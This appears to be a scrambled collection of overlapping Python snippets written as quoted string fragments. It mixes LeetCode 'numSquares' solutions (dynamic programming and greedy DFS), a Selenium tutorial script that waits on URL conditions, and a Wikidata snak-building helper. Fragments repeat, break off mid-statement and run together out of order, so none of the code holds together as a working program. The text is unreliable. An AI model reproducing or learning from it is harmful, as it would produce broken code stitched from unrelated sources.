self.ans def dfs(self, n, count, squares): if n == 0:", "** 2 for x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf')", "class Solution: def numSquares(self, n: int) -> int: squares = [x ** 2", "in range(1, n + 1): for square in squares: if i < square:", "- 1): return True return False square_nums = set([i * i for i", "square_nums = set([i * i for i in range(1, int(n ** 0.5) +", "for i in range(1, int(n ** 0.5) + 1)]) for count in range(1,", "# DP class Solution: def numSquares(self, n: int) -> int: squares = [x", "n # If current count is reaching second best answer, prune it if", "int(n ** 0.5) + 1)]) for count in range(1, n + 1): if", "- k, count - 1): return True return False square_nums = set([i *", "< square: break dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1]", "dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n: int) -> int:", "DP class Solution: def numSquares(self, 
n: int) -> int: squares = [x **", "1): for square in squares: if i < square: break dp[i] = min(dp[i],", "false \"\"\" if count == 1: return n in square_nums for k in", "0.5) + 1)]) for count in range(1, n + 1): if is_divided_by(n, count):", "if is_divided_by(n - k, count - 1): return True return False square_nums =", "if square <= n and count + 1 < self.ans: self.dfs(n - square,", "count=3: true. n=12, count=2: false \"\"\" if count == 1: return n in", "= [0] + [float('inf')] * n for i in range(1, n + 1):", "square_nums: if is_divided_by(n - k, count - 1): return True return False square_nums", "** 2 for x in range(1, int(n ** 0.5) + 1)] dp =", "n, count, squares): if n == 0: self.ans = count else: for i,", "self.ans = count else: for i, square in enumerate(squares): # Find the biggest", "range(1, int(n ** 0.5) + 1)] dp = [0] + [float('inf')] * n", "# Find the biggest square that is no larger than n # If", "[float('inf')] * n for i in range(1, n + 1): for square in", "float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares): if n", "in squares: if i < square: break dp[i] = min(dp[i], dp[i - square]", "for x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0,", "2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if", "= set([i * i for i in range(1, int(n ** 0.5) + 1)])", "in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return", "- square, count + 1, squares[i:]) # Greedy DFS 2 class Solution: def", "squares: if i < square: break dp[i] = min(dp[i], dp[i - square] +", "return self.ans def dfs(self, n, count, squares): if n == 0: self.ans =", "if n == 0: self.ans = count else: for i, square in enumerate(squares):", "best answer, prune it if square <= n and count + 1 <", "n: int) -> int: squares = [x ** 2 for x in range(int(n", "prune it if square <= n and count + 1 < self.ans: self.dfs(n", "second best answer, prune it if square <= n and count + 1", 
"dfs(self, n, count, squares): if n == 0: self.ans = count else: for", "n and count + 1 < self.ans: self.dfs(n - square, count + 1,", "be decomposed into \"count\" number of perfect square numbers. e.g. n=12, count=3: true.", "self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS 2 class Solution:", "= float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares): if", "n + 1): for square in squares: if i < square: break dp[i]", "dp = [0] + [float('inf')] * n for i in range(1, n +", "== 0: self.ans = count else: for i, square in enumerate(squares): # Find", "1)] dp = [0] + [float('inf')] * n for i in range(1, n", "-> int: squares = [x ** 2 for x in range(int(n ** 0.5),", "than n # If current count is reaching second best answer, prune it", "i in range(1, int(n ** 0.5) + 1)]) for count in range(1, n", "<= n and count + 1 < self.ans: self.dfs(n - square, count +", "- square] + 1) return dp[-1] # Greedy DFS 1 class Solution: def", "true if \"n\" can be decomposed into \"count\" number of perfect square numbers.", "square_nums for k in square_nums: if is_divided_by(n - k, count - 1): return", "+ 1)] dp = [0] + [float('inf')] * n for i in range(1,", "larger than n # If current count is reaching second best answer, prune", "-1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count,", "reaching second best answer, prune it if square <= n and count +", "set([i * i for i in range(1, int(n ** 0.5) + 1)]) for", "in range(1, int(n ** 0.5) + 1)]) for count in range(1, n +", "def numSquares(self, n: int) -> int: squares = [x ** 2 for x", "square] + 1) return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self,", "== 1: return n in square_nums for k in square_nums: if is_divided_by(n -", "= [x ** 2 for x in range(1, int(n ** 0.5) + 1)]", "1)]) for count in range(1, n + 1): if is_divided_by(n, count): return count", "i in range(1, n + 1): for square in squares: if i <", "in enumerate(squares): # Find the biggest 
square that is no larger than n", "n=12, count=2: false \"\"\" if count == 1: return n in square_nums for", "def dfs(self, n, count, squares): if n == 0: self.ans = count else:", "square: break dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1] #", "int: squares = [x ** 2 for x in range(int(n ** 0.5), 0,", "squares): if n == 0: self.ans = count else: for i, square in", "number of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\"", "numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\" if count == 1:", "count=2: false \"\"\" if count == 1: return n in square_nums for k", "** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def", "n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed into", "dp[i - square] + 1) return dp[-1] # Greedy DFS 1 class Solution:", "return False square_nums = set([i * i for i in range(1, int(n **", "Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can", "if count == 1: return n in square_nums for k in square_nums: if", "self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares): if n ==", "n == 0: self.ans = count else: for i, square in enumerate(squares): #", "count): \"\"\" return: true if \"n\" can be decomposed into \"count\" number of", "for square in squares: if i < square: break dp[i] = min(dp[i], dp[i", "return n in square_nums for k in square_nums: if is_divided_by(n - k, count", "2 for x in range(1, int(n ** 0.5) + 1)] dp = [0]", "0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n,", "square numbers. e.g. n=12, count=3: true. 
n=12, count=2: false \"\"\" if count ==", "for i, square in enumerate(squares): # Find the biggest square that is no", "# If current count is reaching second best answer, prune it if square", "If current count is reaching second best answer, prune it if square <=", "[0] + [float('inf')] * n for i in range(1, n + 1): for", "if \"n\" can be decomposed into \"count\" number of perfect square numbers. e.g.", "decomposed into \"count\" number of perfect square numbers. e.g. n=12, count=3: true. n=12,", "k, count - 1): return True return False square_nums = set([i * i", "True return False square_nums = set([i * i for i in range(1, int(n", "int) -> int: squares = [x ** 2 for x in range(int(n **", "Solution: def numSquares(self, n: int) -> int: squares = [x ** 2 for", "Greedy DFS 1 class Solution: def numSquares(self, n: int) -> int: squares =", "no larger than n # If current count is reaching second best answer,", "into \"count\" number of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2:", "numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed", "and count + 1 < self.ans: self.dfs(n - square, count + 1, squares[i:])", "** 0.5) + 1)]) for count in range(1, n + 1): if is_divided_by(n,", "dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy DFS", "count - 1): return True return False square_nums = set([i * i for", "[x ** 2 for x in range(int(n ** 0.5), 0, -1)] self.ans =", "1: return n in square_nums for k in square_nums: if is_divided_by(n - k," ]
[ "selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html'", "browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click()", "= Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until(", "= 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b", "WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), ) wdw.until( url_matches('http.*live'), )", "( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw =", "selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url)", "'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a')", "= WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), ) wdw.until( url_matches('http.*live'),", "wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), ) wdw.until(", ") url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links", "from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url =", 
"Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url", "from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox()", "import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw", "Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'),", "from selenium.webdriver import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains,", "selenium.webdriver import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches", "import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser", "import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches )", "<reponame>VeirichR/curso-python-selenium<filename>codigo_das_aulas/aula_10/aula_10_08.py from selenium.webdriver import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import (", "url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10)", "WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser =", "browser.get(url) wdw = WebDriverWait(browser, 10) links = 
browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), )", "url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links =", "url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser," ]
[ "else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId)", "\"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if", "{type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict:", "\"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content", "to datatype {datatype}\" ) elif datatype == \"time\": if type(value) == dict: return", "type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime", "\"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError(", "\"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value)", "\"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", }", "float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\":", "to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) == dict: return", ") else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype =", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if type(value) ==", "typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo", "type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can", "== dict: return {\"value\": value, \"type\": \"time\"} if 
type(value) == datetime: cleanedDateTime =", "if type(value) in [int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\":", "\"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "\"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"}", "\"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj:", "value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr)", "= json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\",", "\"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\":", "\"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value,", "str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else:", "from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str):", "datetime import datetime from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache()", "== dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj", "NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue =", "[ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return 
{\"value\":", "repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\":", "\"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA", "value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "{type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId:", "convert type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\")", "value, \"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"}", "def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return {", "} DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def", "datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not", "{type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\",", "datatype {datatype}\" ) elif datatype == \"time\": if type(value) == dict: return {\"value\":", "import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo =", "datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\",", "{\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "\"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"]", "0, \"before\": 0, \"after\": 0, 
\"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj,", "{datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value,", "datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue, \"datatype\":", "\"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return", "\"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"]", "not convert type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not", ".wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = {", "to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\",", "if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str:", "\"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return", "]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value) ==", "if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int,", "type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\":", "\"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in", "\"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return 
{\"value\":", "WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" +", "return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)}", "functools import json from datetime import datetime from typing import Any, Dict from", "buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]:", "type(value) in [int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\",", "\"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict:", "if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str:", "\"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr", "TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype ==", "== dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert", "Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query", "} return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type", "minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() +", ") elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\":", "elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"}", "dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\": 
{\"value\":", "getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\":", "cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\",", "import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\":", "= {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError(", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) ==", "0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise", "import json from datetime import datetime from typing import Any, Dict from .wikidatasession", "import datetime from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def", "if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any]", "{\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\":", "datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\":", "== str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not", "valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj,", "datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value):", "+ propertyId, \"rvprop\": \"content\", } DATA 
= repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content =", "= { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\":", "if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value) == datetime:", "value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", ") elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\":", "json from datetime import datetime from typing import Any, Dict from .wikidatasession import", "= list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype", "== str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"}", "\"monolingualtext\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\":", "11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can", "{datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype", "in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return", "\"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError(", "{ \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0,", "value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value}", "== \"globe-coordinate\": if type(value) == dict: return {\"value\": 
value, \"type\": \"globecoordinate\"} else: raise", "\"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return", "type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not", "return {\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0,", "\"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0)", "== datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = {", "repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value):", "cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\"", "if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) ==", "{ \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\",", "0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"}", "str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if", "{\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId,", "\"http://www.wikidata.org/entity/Q1985727\", } return 
{\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert", "else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) else:", "\"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else:", "{\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)}", "{\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "\"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\":", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if", "\"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert", "in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) ==", "{datatype}\" ) elif datatype == \"time\": if type(value) == dict: return {\"value\": value,", "dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\":", "dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type", "return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)}", "value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\":", "elif datatype == \"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"}", "datatype == \"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if", "value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat()", "f\"Can not 
convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\":", "= repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str,", "convert type {type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\",", "implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return", "value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj = { \"amount\": \"%+f\"", "second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\",", "= value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" +", "= WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\"", "valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0,", "{datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype,", "datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId,", "return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)}", "\"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "\"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError(", "[int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return", "list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def 
buildDataValue(datatype: str, value): if datatype in", "% value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError(", "\"type\": \"quantity\"} if type(value) in [int, float]: valueObj = { \"amount\": \"%+f\" %", "value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value)", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value)", "\"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else:", "str): repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\",", "\"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str, Any] =", "= buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue, \"datatype\": datatype,", "elif datatype == 